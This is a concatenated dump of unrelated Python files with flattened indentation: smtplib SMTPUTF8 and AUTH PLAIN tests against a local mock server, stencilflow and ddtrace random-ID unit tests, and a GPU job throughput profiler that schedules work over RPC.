# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received \r\n to \n, so we can't easily test that
# we are successfully sending \r\n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(smtplib.SMTPNotSupportedError,
smtp.send_message, msg)
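# The canned initial response below is base64('\0psu\0doesnotexist'):
# empty authzid, username 'psu', password 'doesnotexist'.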
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN supports an initial response, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(
BadHELOServerTests,
DebuggingServerTests,
GeneralTests,
NonConnectingTests,
SMTPAUTHInitialResponseSimTests,
SMTPSimTests,
TooLongLineTests,
)
if __name__ == '__main__':
test_main()
|
test_stencilflow.py
|
#!/usr/bin/env python3
import multiprocessing as mp
import os
import sys
import json
import unittest
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
TEST_FOLDER = os.path.join(os.path.dirname(__file__), "stencils")
from stencilflow.bounded_queue import BoundedQueue
import dace.dtypes
class BoundedQueueTest(unittest.TestCase):
def test_import(self):
# init
queue = BoundedQueue(name="test", maxsize=5)
# init_queue
collection = [1.0, 2.0, 3.0, 4.0, 5.0]
queue.import_data(collection)
# check size
self.assertEqual(queue.size(), len(collection))
# check that data was added in the right order
self.assertEqual(queue.try_peek_last(), collection[len(collection) - 1])
# check exception for overfilling queue
self.assertRaises(RuntimeError, queue.import_data, 6 * [1.0])
def test_enq_deq(self):
# init
queue = BoundedQueue(name="test", maxsize=1, collection=[1.0])
# check size
self.assertEqual(queue.size(), 1)
# empty queue, check element value
self.assertEqual(queue.dequeue(), 1.0)
# check size
self.assertEqual(queue.size(), 0)
# check size
self.assertTrue(queue.is_empty())
# check exception on underflow
self.assertRaises(RuntimeError, queue.dequeue)
# enqueue element
queue.enqueue(1.0)
# check size
self.assertTrue(queue.is_full())
# check exception on overflow
self.assertRaises(RuntimeError, queue.enqueue, 2.0)
def test_try_enq_deq(self):
# init
queue = BoundedQueue(name="test", maxsize=1, collection=[1.0])
# check size
self.assertEqual(queue.size(), 1)
# empty queue, check element value
self.assertEqual(queue.try_dequeue(), 1.0)
# check size
self.assertEqual(queue.size(), 0)
# check size
self.assertTrue(queue.is_empty())
# dequeue from empty queue, check return value
self.assertFalse(queue.try_dequeue())
# enqueue, into non-full list, check return value
self.assertTrue(queue.try_enqueue(1.0))
# check size
self.assertTrue(queue.is_full())
# enqueue into full queue, check return value
self.assertFalse(queue.try_enqueue(2.0))
def test_peek(self):
# init
queue = BoundedQueue(name="test", maxsize=2, collection=[1.0, 2.0])
# check value at index 0
self.assertEqual(queue.peek(0), 1.0)
# check value at index 1
self.assertEqual(queue.peek(1), 2.0)
# check value at last location
self.assertEqual(queue.try_peek_last(), 2.0)
# empty queue
queue.dequeue()
queue.dequeue()
# peek on empty queue, check return value
self.assertFalse(queue.try_peek_last())
from stencilflow.calculator import Calculator
from numpy import cos
class CalculatorTest(unittest.TestCase):
def test_calc(self):
# init vars
variables = dict()
variables["a"] = 7.0
variables["b"] = 2.0
# init calc
computation = "cos(a + b) if (a > b) else (a + 5) * b"
calculator = Calculator()
# do manual calculation and compare result
result = cos(variables["a"] + variables["b"]) if (variables["a"] > variables["b"]) else (variables["a"] + 5) * \
variables["b"]
self.assertEqual(calculator.eval_expr(variables, computation), result)
class RunProgramTest(unittest.TestCase):
def test(self):
pass # not a general test case, since DaCe and the Intel FPGA OpenCL SDK have to be installed and configured
import stencilflow.helper as helper
class HelperTest(unittest.TestCase):
def test(self):
# check max_dict_entry_key
self.assertEqual(
helper.max_dict_entry_key({
"a": [1, 0, 0],
"b": [0, 1, 0],
"c": [0, 0, 1]
}), "a")
# check list_add_cwise
self.assertEqual(helper.list_add_cwise([1, 2, 3], [3, 2, 1]), [4, 4, 4])
# check list_subtract_cwise
self.assertEqual(helper.list_subtract_cwise([1, 2, 3], [1, 2, 3]),
[0, 0, 0])
# check dim_to_abs_val
self.assertEqual(helper.dim_to_abs_val([3, 2, 1], [10, 10, 10]), 321)
# check convert_3d_to_1d
self.assertEqual(
helper.convert_3d_to_1d(dimensions=[10, 10, 10], index=[3, 2, 1]),
321)
# check load_array
self.assertListEqual(
list(
helper.load_array({
"data":
os.path.join(os.path.dirname(__file__), "stencils",
"helper_test.csv"),
"data_type":
helper.str_to_dtype("float64")
})), [7.0, 7.0])
self.assertListEqual(
list(
helper.load_array({
"data":
os.path.join(os.path.dirname(__file__), "stencils",
"helper_test.dat"),
"data_type":
helper.str_to_dtype("float64")
})), [7.0, 7.0])
# check save_array / load_array
out_data = np.array([1.0, 2.0, 3.0])
file = {"data": "test.dat", "data_type": helper.str_to_dtype("float64")}
helper.save_array(out_data, file["data"])
in_data = helper.load_array(file)
self.assertTrue(helper.arrays_are_equal(out_data, in_data))
os.remove(file["data"])
# check unique
not_unique = [1.0, 2.0, 1.0]
self.assertListEqual(sorted(helper.unique(not_unique)), [1.0, 2.0])
from stencilflow.log_level import LogLevel
import numpy as np
from stencilflow import run_program
def _return_result(queue, *args, **kwargs):
ret = run_program(*args, **kwargs)
queue.put(ret)
def _run_program(*args, **kwargs):
# We run each kernel with multiprocessing, because the Altera environment
# does not seem to properly tear down the environment when destroyed.
# This way, each kernel is run in a separate process, so that it is run
# with a clean environment.
queue = mp.Queue()
p = mp.Process(target=_return_result, args=(queue, ) + args, kwargs=kwargs)
p.start()
p.join()
return queue.get()
class ProgramTest(unittest.TestCase):
def test_and_simulate(self):
test_directory = os.path.join(os.path.dirname(__file__), "stencils")
for stencil_file in [
"simulator", "simulator2", "simulator3", "simulator4",
"simulator5", "simulator6", "simulator8", "simulator9",
"simulator10", "simulator11"
]:
print("Simulating and emulating program {}...".format(stencil_file))
stencil_file = os.path.join(test_directory, stencil_file + ".json")
_run_program(
stencil_file,
"emulation",
compare_to_reference=True,
# TODO: Simulation is broken for 2D
run_simulation=False,
# run_simulation=True,
log_level=LogLevel.BASIC,
input_directory=os.path.abspath(test_directory))
def test_program(self):
test_directory = os.path.join(os.path.dirname(__file__), "stencils")
for stencil_file in [
"varying_dimensionality",
"jacobi2d_128x128",
"jacobi2d_128x128_8vec",
"jacobi3d_32x32x32_8itr",
"jacobi3d_32x32x32_8itr_4vec",
]:
print("Testing program {}...".format(stencil_file))
stencil_file = os.path.join(test_directory, stencil_file + ".json")
_run_program(stencil_file,
"emulation",
compare_to_reference=True,
run_simulation=False,
log_level=LogLevel.NO_LOG,
input_directory=os.path.abspath(test_directory))
if __name__ == '__main__':
"""
Run all unit tests.
"""
try:
unittest.main()
except SystemExit as ex:
print('\n', flush=True)
# Skip all teardown to avoid crashes affecting exit code
os._exit(ex.code)
|
test_rand.py
|
from itertools import chain
import multiprocessing as mp
try:
from multiprocessing import SimpleQueue as MPQueue
except ImportError:
from multiprocessing.queues import SimpleQueue as MPQueue
import os
import threading
from ddtrace import Span
from ddtrace import tracer
from ddtrace.internal import _rand
from ddtrace.internal.compat import PYTHON_VERSION_INFO
from ddtrace.internal.compat import Queue
def test_random():
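# Draw 2**16 values and check each is a distinct 64-bit integer in range.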
m = set()
for i in range(0, 2 ** 16):
n = _rand.rand64bits()
assert 0 <= n <= 2 ** 64 - 1
assert n not in m
m.add(n)
def test_fork_no_pid_check():
q = MPQueue()
pid = os.fork()
# Generate random numbers in the parent and child processes after forking.
# The child sends back their numbers to the parent where we check to see
# if we get collisions or not.
if pid > 0:
# parent
rns = {_rand.rand64bits(check_pid=False) for _ in range(100)}
child_rns = q.get()
if PYTHON_VERSION_INFO >= (3, 7):
# Python 3.7+ have fork hooks which should be used
# Hence we should not get any collisions
assert rns & child_rns == set()
else:
# On Python < 3.7 we don't have any mechanism (other than the pid
# check) to reseed on fork, so we expect there to be collisions.
assert rns == child_rns
else:
# child
try:
rngs = {_rand.rand64bits(check_pid=False) for _ in range(100)}
q.put(rngs)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_fork_pid_check():
q = MPQueue()
pid = os.fork()
# Generate random numbers in the parent and child processes after forking.
# The child sends back their numbers to the parent where we check to see
# if we get collisions or not.
if pid > 0:
# parent
rns = {_rand.rand64bits(check_pid=True) for _ in range(100)}
child_rns = q.get()
if PYTHON_VERSION_INFO >= (3, 7):
# Python 3.7+ have fork hooks which should be used
# Hence we should not get any collisions
assert rns & child_rns == set()
else:
# On Python < 3.7 the pid check reseeds for us, so there also
# should not be any collisions.
assert rns & child_rns == set()
else:
# child
try:
rngs = {_rand.rand64bits(check_pid=True) for _ in range(100)}
q.put(rngs)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_multiprocess():
q = MPQueue()
def target(q):
q.put([_rand.rand64bits() for _ in range(100)])
ps = [mp.Process(target=target, args=(q,)) for _ in range(30)]
for p in ps:
p.start()
for p in ps:
p.join()
ids_list = [_rand.rand64bits() for _ in range(1000)]
ids = set(ids_list)
assert len(ids_list) == len(ids), "Collisions found in ids"
while not q.empty():
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids_list) == len(child_ids), "Collisions found in subprocess ids"
assert ids & child_ids == set()
ids = ids | child_ids # accumulate the ids
def test_threadsafe():
# Check that the PRNG is thread-safe.
# This obviously won't guarantee thread safety, but it's something
# at least.
# To provide some validation of this method I wrote a slow, unsafe RNG:
#
# state = 4101842887655102017
#
# def bad_random():
# global state
# state ^= state >> 21
# state ^= state << 35
# state ^= state >> 4
# return state * 2685821657736338717
#
# which consistently fails this test.
q = Queue()
def _target():
# Generate a bunch of numbers to try to maximize the chance that
# two threads will be calling rand64bits at the same time.
rngs = [_rand.rand64bits() for _ in range(200000)]
q.put(rngs)
ts = [threading.Thread(target=_target) for _ in range(5)]
for t in ts:
t.start()
for t in ts:
t.join()
ids = set()
while not q.empty():
new_ids_list = q.get()
new_ids = set(new_ids_list)
assert len(new_ids) == len(new_ids_list), "Collision found in ids"
assert ids & new_ids == set()
ids = ids | new_ids
assert len(ids) > 0
def test_tracer_usage_fork():
q = MPQueue()
pid = os.fork()
# Similar test to test_fork() above except we use the tracer API.
# In this case we expect to never have collisions.
if pid > 0:
# parent
parent_ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)])
)
parent_ids = set(parent_ids_list)
assert len(parent_ids) == len(parent_ids_list), "Collisions found in parent process ids"
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in child process ids"
assert parent_ids & child_ids == set()
else:
# child
try:
child_ids = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)])
)
q.put(child_ids)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_tracer_usage_multiprocess():
q = MPQueue()
# Similar to test_multiprocess(), ensures that no collisions are
# generated between parent and child processes while using
# multiprocessing.
# Note that we have to be wary of the size of the underlying
# pipe in the queue: https://bugs.python.org/msg143081
def target(q):
ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(10)])
)
q.put(ids_list)
ps = [mp.Process(target=target, args=(q,)) for _ in range(30)]
for p in ps:
p.start()
for p in ps:
p.join()
ids_list = list(chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)]))
ids = set(ids_list)
assert len(ids) == len(ids_list), "Collisions found in ids"
while not q.empty():
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in subprocess ids"
assert ids & child_ids == set()
ids = ids | child_ids # accumulate the ids
def test_span_api_fork():
q = MPQueue()
pid = os.fork()
if pid > 0:
# parent
parent_ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [Span(None, None) for _ in range(100)])
)
parent_ids = set(parent_ids_list)
assert len(parent_ids) == len(parent_ids_list), "Collisions found in parent process ids"
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in child process ids"
assert parent_ids & child_ids == set()
else:
# child
try:
child_ids = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [Span(None, None) for _ in range(100)])
)
q.put(child_ids)
finally:
os._exit(0)
|
measure_throughput.py
|
import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
import argparse
import copy
import datetime
import json
import queue
import threading
import time
from job_id_pair import JobIdPair
from job_table import JobTable
from runtime.rpc import scheduler_server, scheduler_client
import utils
BASE_DISTRIBUTED_LEASE_STEPS = 150
SERVER_PORT = 50060
INFINITY = 1000000
MULTI_GPU_JOB_TYPES = ['ResNet-18', 'ResNet-50', 'Transformer', 'LM']
class Profiler:
def __init__(self, num_workers, measurement_time, log_file=None):
# Profiler parameters.
self._num_workers = num_workers
self._measurement_time = measurement_time
self._log_file = log_file
# Job metadata.
self._job_id_counter = 0
self._job_id_to_job_type = {}
self._throughputs = {}
self._scale_factors = {}
self._completed_steps = {}
self._max_steps = {}
self._elapsed_time = {}
self._lease_update_requests = {}
self._num_throughput_updates = {}
# Worker metadata.
self._cluster_spec = {}
self._worker_id_counter = 0
self._worker_connections = {}
self._worker_id_to_worker_type = {}
self._worker_type_to_worker_ids = {}
self._worker_addrs = {}
self._worker_queue = queue.Queue()
self._all_rpc_clients = []
# Synchronization lock.
self._lock = threading.Lock()
# Logging thread setup.
self._write_queue = queue.Queue()
self._logging_thread = threading.Thread(target=self._print_logs)
self._logging_thread.daemon = True
self._logging_thread.start()
# Server thread setup.
callbacks = {
'RegisterWorker': self._register_worker_callback,
'Done': self._done_callback,
'UpdateLease': self._update_lease_callback,
}
self.server_thread = threading.Thread(
target=scheduler_server.serve,
args=(SERVER_PORT, callbacks, self._write_queue))
self.server_thread.daemon = True
self.server_thread.start()
"""
=====================================================================
Utility functions.
=====================================================================
"""
def _print_logs(self):
"""Print logging information."""
while True:
output = self._write_queue.get()
if self._log_file is not None:
with open(self._log_file, 'a') as f:
f.write('[%s] %s' % (str(datetime.datetime.now()),
output))
print('[%s] %s' % (str(datetime.datetime.now()),
output))
def _initialize_throughputs(self, worker_type=None, job_type=None):
"""Initialize throughputs data structure."""
if worker_type is not None:
self._throughputs[worker_type] = {}
for job_description in JobTable:
job_type = job_description.model
self._throughputs[worker_type][job_type] = {}
elif job_type is not None:
for worker_type in self._throughputs:
self._throughputs[worker_type][job_type] = {}
def _initialize_completed_steps_and_elapsed_time(self, job_id=None,
worker_type=None):
if job_id is not None:
assert not job_id.is_pair()
self._completed_steps[job_id] = {}
self._elapsed_time[job_id] = {}
for worker_type in self._cluster_spec:
self._completed_steps[job_id][worker_type] = 0
self._elapsed_time[job_id][worker_type] = 0.0
elif worker_type is not None:
for job_id in self._completed_steps:
self._completed_steps[job_id][worker_type] = 0
self._elapsed_time[job_id][worker_type] = 0.0
def _initialize_task(self, job_descriptions, scale_factor=1):
"""Initialize a task to submit to the worker."""
task = []
for job_description in job_descriptions:
with self._lock:
job_id = JobIdPair(self._job_id_counter, None)
self._job_id_counter += 1
job_type = job_description.model
if scale_factor > 1:
job_type += ' (scale factor %d)' % (scale_factor)
self._initialize_throughputs(job_type=job_type)
self._initialize_completed_steps_and_elapsed_time(
job_id=job_id)
self._max_steps[job_id] = {}
self._job_id_to_job_type[job_id] = job_type
self._scale_factors[job_id] = scale_factor
task.append([job_id, job_description.command,
job_description.needs_data_dir,
job_description.num_steps_arg,
INFINITY])
return task
def _can_be_run_multi_gpu(self, job_type):
"""Returns True if the job type supports distributed execution."""
for multi_gpu_job_type in MULTI_GPU_JOB_TYPES:
if multi_gpu_job_type in job_type:
return True
return False
def _initialize_per_worker_type_task_queues(self, isolated,
packing, distributed):
"""Initializes the task queues for every worker type."""
per_worker_type_task_queues = {}
for worker_type in self._cluster_spec:
per_worker_type_task_queues[worker_type] = queue.Queue()
scale_factor = 1
while scale_factor <= max(self._cluster_spec.values()):
if isolated:
for worker_type in per_worker_type_task_queues:
if scale_factor > self._cluster_spec[worker_type]:
continue
for i in range(len(JobTable)):
job_type = JobTable[i].model
if (scale_factor > 1 and
not self._can_be_run_multi_gpu(job_type)):
continue
task = self._initialize_task(
[JobTable[i]], scale_factor=scale_factor)
per_worker_type_task_queues[worker_type].put(
(task, scale_factor))
# NOTE: We do not profile distributed + packed jobs because the
# performance dropoff is too significant.
if packing and scale_factor == 1:
for worker_type in per_worker_type_task_queues:
for i in range(len(JobTable)):
job_type = JobTable[i].model
for j in range(i, len(JobTable)):
job_type = JobTable[j].model
task = self._initialize_task(
[JobTable[i], JobTable[j]],
scale_factor=scale_factor)
per_worker_type_task_queues[worker_type].put(
(task, scale_factor))
if distributed:
scale_factor *= 2
else:
break
return per_worker_type_task_queues
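# Illustrative queue contents (a hypothetical sketch, not from a real run): with
# cluster_spec = {'v100': 2}, isolated=True, packing=False and distributed=True,
# the 'v100' queue receives one single-GPU task per JobTable entry at
# scale_factor 1, followed by a scale_factor 2 task for each model matching
# MULTI_GPU_JOB_TYPES; with distributed=False the loop exits after scale_factor 1.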
def _wait_for_workers(self):
"""Wait for the expected number of workers to register."""
while True:
with self._lock:
num_workers = len(self._worker_connections.keys())
if num_workers < self._num_workers:
time.sleep(5)
else:
break
def _get_job_types_from_job_id(self, job_id):
"""Returns a list of the job types associated with the job ID."""
job_types = []
if job_id.is_pair():
for single_job_id in job_id.singletons():
job_types.append(self._job_id_to_job_type[single_job_id])
else:
job_types.append(self._job_id_to_job_type[job_id])
job_types.append(None)
return job_types
def _reset_workers(self):
"""Sends a reset message to all workers."""
for rpc_client in self._all_rpc_clients:
rpc_client.reset()
def _shutdown_workers(self):
"""Sends a shutdown message to all workers."""
for rpc_client in self._all_rpc_clients:
rpc_client.shutdown()
"""
=====================================================================
RPC callbacks.
=====================================================================
"""
def _register_worker_callback(self, worker_type, num_gpus, ip_addr, port):
"""Registers a new worker."""
rpc_client = scheduler_client.SchedulerRpcClient(ip_addr, port)
self._all_rpc_clients.append(rpc_client)
per_worker_ids = []
with self._lock:
if worker_type not in self._cluster_spec:
self._cluster_spec[worker_type] = 0
self._throughputs[worker_type] = {}
self._worker_type_to_worker_ids[worker_type] = []
self._initialize_throughputs(worker_type=worker_type)
self._initialize_completed_steps_and_elapsed_time(
worker_type=worker_type)
self._cluster_spec[worker_type] += num_gpus
for i in range(num_gpus):
worker_id = self._worker_id_counter
self._worker_id_counter += 1
per_worker_ids.append(worker_id)
self._worker_id_to_worker_type[worker_id] = worker_type
self._worker_type_to_worker_ids[worker_type].append(worker_id)
self._worker_addrs[worker_id] = (ip_addr, port)
self._worker_connections[worker_id] = rpc_client
self._write_queue.put(
'Registered worker %d (%s) at %s:%s' % (worker_id,
worker_type,
ip_addr,
port))
return (per_worker_ids, self._measurement_time)
def _update_lease_callback(self, job_id, worker_id, steps, duration,
max_steps, max_duration):
scale_factor = self._scale_factors[job_id]
if steps == 0 or duration == 0:
return (INFINITY, self._measurement_time)
elif scale_factor == 1:
return (max_steps, max_duration)
else:
worker_type = self._worker_id_to_worker_type[worker_id]
with self._lock:
update_id = len(self._lease_update_requests[job_id])
self._lease_update_requests[job_id].append((steps, duration,
max_steps,
max_duration))
if update_id == 0:
if (job_id in self._max_steps and
worker_type in self._max_steps[job_id]):
del self._max_steps[job_id][worker_type]
# The first worker to request a lease update computes the new
# lease for all workers.
if update_id == 0:
with self._lock:
remaining_time = \
(self._measurement_time -
duration % self._measurement_time)
throughput = steps / duration
remaining_steps = max(1, int(remaining_time * throughput))
max_completed_steps = \
max([request[0] for request in \
self._lease_update_requests[job_id]])
self._max_steps[job_id][worker_type] = \
max_completed_steps + remaining_steps
return (self._max_steps[job_id][worker_type], INFINITY)
else:
# Wait for the first update to complete.
while True:
with self._lock:
if worker_type in self._max_steps[job_id]:
break
# TODO: Sleep for less time?
time.sleep(1)
return (self._max_steps[job_id][worker_type], INFINITY)
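# Illustrative arithmetic for the lease extension above (hypothetical numbers):
# with measurement_time = 150 s, a first worker reporting steps = 2000 over
# duration = 40 s gives throughput = 50 steps/s, remaining_time = 150 - (40 % 150)
# = 110 s and remaining_steps = 5500, so every worker in the distributed job is
# granted max_steps = max_completed_steps + 5500 with an unbounded duration.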
def _done_callback(self, job_id, worker_id, all_num_steps,
all_execution_times):
"""Updates the throughput of the associated job(s)."""
with self._lock:
worker_type = self._worker_id_to_worker_type[worker_id]
job_types = self._get_job_types_from_job_id(job_id)
all_throughputs = self._throughputs[worker_type]
scale_factor = self._scale_factors[job_id.singletons()[0]]
job_throughputs = []
for (num_steps, execution_time) in \
zip(all_num_steps, all_execution_times):
if min(all_num_steps) <= 0 or min(all_execution_times) <= 0:
job_throughputs.append(0)
else:
job_throughputs.append(num_steps / execution_time)
# Initialize/reset throughputs if necessary.
job_failed = min(all_execution_times) <= 0
if job_failed or job_types[1] not in all_throughputs[job_types[0]]:
if job_id.is_pair():
all_throughputs[job_types[0]][job_types[1]] = [0.0, 0.0]
all_throughputs[job_types[1]][job_types[0]] = [0.0, 0.0]
else:
all_throughputs[job_types[0]][job_types[1]] = 0.0
# Update throughputs.
if job_failed:
self._num_throughput_updates[job_id] = scale_factor
else:
if job_id.is_pair():
for i in range(len(job_throughputs)):
throughput = job_throughputs[i]
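# When both jobs in the pair share the same job type, the two updates
# below target the same throughput list, so the value is halved to
# avoid double counting.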
if job_types[0] == job_types[1]:
throughput /= 2.0
all_throughputs[job_types[0]][job_types[1]][i] += \
throughput
all_throughputs[job_types[1]][job_types[0]][1-i] += \
throughput
else:
all_throughputs[job_types[0]][job_types[1]]+= \
job_throughputs[0]
self._num_throughput_updates[job_id] += 1
# Print logging information.
if self._num_throughput_updates[job_id] == scale_factor:
updated_throughputs = \
all_throughputs[job_types[0]][job_types[1]]
throughputs_str = str(updated_throughputs)
if job_id.is_pair():
self._write_queue.put(
'Throughputs for %s on %s: %s' % (str(job_types),
worker_type,
throughputs_str))
else:
assert(job_types[1] is None)
self._write_queue.put(
'Throughput for %s on %s: %s' % (job_types[0],
worker_type,
throughputs_str))
self._worker_queue.get()
"""
=====================================================================
Public API functions.
=====================================================================
"""
def profile(self, isolated, packed, distributed):
"""Profiles the job types in the desired configuration(s)."""
self._wait_for_workers()
per_worker_type_task_queues = \
self._initialize_per_worker_type_task_queues(isolated,
packed,
distributed)
done = False
while not done:
num_tasks = 0
for worker_type in per_worker_type_task_queues:
num_tasks += per_worker_type_task_queues[worker_type].qsize()
assert(num_tasks > 0)
# Schedule tasks for each worker type.
for worker_type in self._cluster_spec:
worker_ids = self._worker_type_to_worker_ids[worker_type]
worker_id_ptr = 0
num_remaining_worker_ids = len(worker_ids)
unschedulable_queue = queue.Queue()
# Continue scheduling tasks until there are no remaining tasks
# or no remaining workers.
while (num_remaining_worker_ids > 0 and
not per_worker_type_task_queues[worker_type].empty()):
(task, scale_factor) = \
per_worker_type_task_queues[worker_type].get()
# If there are not enough remaining workers to
# schedule this task, try again later.
if scale_factor > num_remaining_worker_ids:
unschedulable_queue.put((task, scale_factor))
continue
if len(task) > 1:
merged_job_id = JobIdPair(task[0][0][0],
task[1][0][0])
else:
merged_job_id = task[0][0]
self._num_throughput_updates[merged_job_id] = 0
# Schedule the task.
for i in range(worker_id_ptr, worker_id_ptr+scale_factor):
worker_id = worker_ids[i]
for j, job_description in enumerate(task):
job_id = job_description[0]
# Reset any existing lease information.
self._lease_update_requests[job_id] = []
if worker_type in self._max_steps[job_id]:
del self._max_steps[job_id][worker_type]
# Log task.
job_type = self._job_id_to_job_type[job_id]
self._write_queue.put(
'Scheduling job %s (%s) on '
'worker %d (%s)' % (job_id,
job_type,
worker_id,
worker_type))
# Add necessary arguments for distributed jobs.
if scale_factor > 1:
if i == worker_id_ptr:
if j == 0:
base_commands = []
base_commands.append(job_description[1])
master_id = worker_ids[worker_id_ptr]
(master_addr, master_port) = \
self._worker_addrs[master_id]
offset_master_port = \
master_port + 1 + master_id + j
world_size = scale_factor
rank = i - worker_id_ptr
command = ('%s --master_addr %s '
'--master_port %d '
'--world_size %d '
'--rank %d') % (base_commands[j],
master_addr,
offset_master_port,
world_size,
rank)
task[j][1] = command
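# Illustrative result of the command rewriting above (hypothetical values): for
# scale_factor = 2 with worker_ids = [4, 5], worker address ('10.0.0.4', 50061)
# and j = 0, offset_master_port = 50061 + 1 + 4 + 0 = 50066, so the job command
# gains '--master_addr 10.0.0.4 --master_port 50066 --world_size 2 --rank 0' on
# worker 4 and '--rank 1' on worker 5.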
self._worker_queue.put(worker_id)
